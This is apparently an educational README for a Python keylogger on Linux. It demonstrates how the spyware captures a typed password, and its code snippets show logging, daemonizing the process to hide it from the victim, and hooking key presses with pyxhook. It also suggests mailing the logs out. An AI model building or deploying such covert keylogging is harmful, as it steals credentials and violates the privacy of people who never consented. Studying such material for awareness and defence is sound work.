# Spyware

There exist many ways of spying on the victim. Our **spyware** is represented by **keylogger**, a simple program that monitors pressed keys on the keyboard and can see everything you type. This **keylogger** is implemented in the file `keylogger.py`.

#### Demonstration of behavior

We don't need any specific preparation before an execution of the keylogger (`./keylogger.py`). We can observe that after the execution nothing happened and we can type new commands, just like in the case of us pressing only the key `Enter`. Now you can do on your system anything you want. For the demonstration you can open a browser and type something like `Passwd` representing your potential password, just like you would do on any login page of your social media.

You can now spot that in the same folder as our **keylogger** is located a new file `activity.log`. By observing the file your can see that it contains all keys you have pressed on your keyboard after the execution, including your password `Passwd`. Attacker can easily access those file and modify the keylogger to send them on specific e-mail address or with a combination with different kind of malware he might gain direct access to them via network.

```
Key: P
Key: a
Key: s
Key: s
Key: w
Key: d
```

Creation of **keylogger** is very simple process as it is described below and anyone can do it just with a basic knowledge of programming and understandment of operating systems. That's why we should be always cautions when we execute any uncommon or not trusted file.

#### How does it work?

 - Firstly, we configure our logger. We can specify the file in which should be the data stored as well as a format of the message.
   ```python
   logging.basicConfig(
       level=logging.DEBUG,
       filename='activity.log',
       format='Key: %(message)s',
   )
   ```
 - Then we have to obtain the logging file handler. We will explain why in the next step.
   ```python
   handler = logging.getLogger().handlers[0].stream
   ```
 - To make our spyware harder to spot by the victim, we want it to run in the background as a **daemon**.
   To learn more about daemons, see [the guide to daemons](https://kb.iu.edu/d/aiau). For this purpose we
   will use a standart Python module `daemon` that will allow us to daemonize our **keylogger**.
   When the the daemon is created, we will loose connections to all file handler like `stdout` or even 
   our logging file unless we specify that the files should be preserved. That's why we have obtained
   logging file handler in the previous step. In the context of our hidden daemon we can now create the
   keylogger and start its activity.
   ```python
   # Daemonize the process to hide it from the victim.
   with daemon.DaemonContext(files_preserve=[handler]):
       # Create keylogger.
       keylogger = Keylogger('SimpleSpyware')
       # Start logging activity of the user.
       keylogger.start_logging()
   ```
  - For obtaining the _key press events_ we can use a python module for Linux called `pyxhook`. If we
    would create a keylogger for Windows, we should use module `pyHook` instead, but their interface is
    very similar. We create a **hooking manager**, that will manage event handling and allows us to 
    set a callback for those events. Callback is in our case a function that will be called each time a new
    event is obtained (__keydown_callback_). The only thing this method does is logging the key into our
    specified file `activity.log`.
    ```python
    hook_manager = pyxhook.HookManager()
    # Assign callback for handling key strokes.
    hook_manager.KeyDown = self._keydown_callback
    # Hook the keyboard and start logging.
    hook_manager.HookKeyboard()
    hook_manager.start()
    ```